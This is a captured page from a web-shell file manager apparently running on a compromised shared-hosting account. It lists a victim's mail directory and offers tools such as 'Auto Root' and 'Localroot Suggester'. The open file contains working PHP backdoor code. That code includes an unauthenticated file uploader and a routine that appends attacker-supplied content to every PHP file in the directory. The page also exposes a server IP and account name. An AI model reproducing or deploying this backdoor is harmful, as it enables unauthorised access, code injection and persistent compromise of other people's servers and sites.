Linux thaedus.aserv.co.za 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 197.242.159.149 & Your IP : 216.73.217.62
Domains :
Cant Read [ /etc/named.conf ]
User : bigpuxtb
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
bigpuxtb /
mail /
Delete
Unzip
Name
Size
Permission
Date
Action
.Archive
[ DIR ]
drwxr-x--x
2020-01-22 14:47
.Drafts
[ DIR ]
drwxr-x--x
2020-01-22 14:47
.Sent
[ DIR ]
drwxr-x--x
2020-01-22 14:47
.Trash
[ DIR ]
drwxr-x--x
2024-08-12 06:16
.info@bigpunchmedia_co_za
[ DIR ]
drwxr-x--x
2026-08-04 22:35
.spam
[ DIR ]
drwxr-x--x
2020-01-22 14:47
.stank@bigpunchmedia_co_za
[ DIR ]
drwxr-x--x
2026-08-05 03:04
airco.bigpunchmedia.co.za
[ DIR ]
drwxr-x--x
2026-03-13 18:59
bigpunchmedia.co.za
[ DIR ]
drwxr-x--x
2026-03-25 19:09
cur
[ DIR ]
drwxr-x--x
2026-03-25 19:09
new
[ DIR ]
drwxr-x--x
2026-03-26 16:09
tmp
[ DIR ]
drwxr-x--x
2026-03-26 16:09
dovecot-acl-list
0
B
-rw-r-----
2018-12-18 12:48
dovecot-quota
53
B
-rw-r-----
2026-03-26 16:09
dovecot-uidlist
212.87
KB
-rw-r-----
2026-03-26 16:09
dovecot-uidvalidity
8
B
-rw-r-----
2020-01-22 14:47
dovecot-uidvalidity.5bc4e078
0
B
-r--r--r--
2018-10-15 18:46
dovecot.index
54.2
KB
-rw-r-----
2026-03-25 23:31
dovecot.index.cache
4.22
MB
-rw-r-----
2026-03-26 16:09
dovecot.index.log
8.58
KB
-rw-r-----
2026-03-26 16:09
dovecot.index.log.2
32.15
KB
-rw-r-----
2026-03-25 12:58
dovecot.list.index.log
7.29
KB
-rw-r-----
2024-08-12 06:16
dovecot.mailbox.log
120
B
-rw-r-----
2020-01-22 14:47
maildirsize
437
B
-rw-------
2026-03-26 16:09
rhugrxtx.php
760
B
-rw-r-----
2026-01-07 15:23
subscriptions
31
B
-rw-r-----
2020-01-22 14:47
wp-blog-header.php
2.74
KB
-rw-r-----
2026-01-12 04:05
wp-cron.php
2.74
KB
-rw-r-----
2026-01-12 04:05
Save
Rename
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>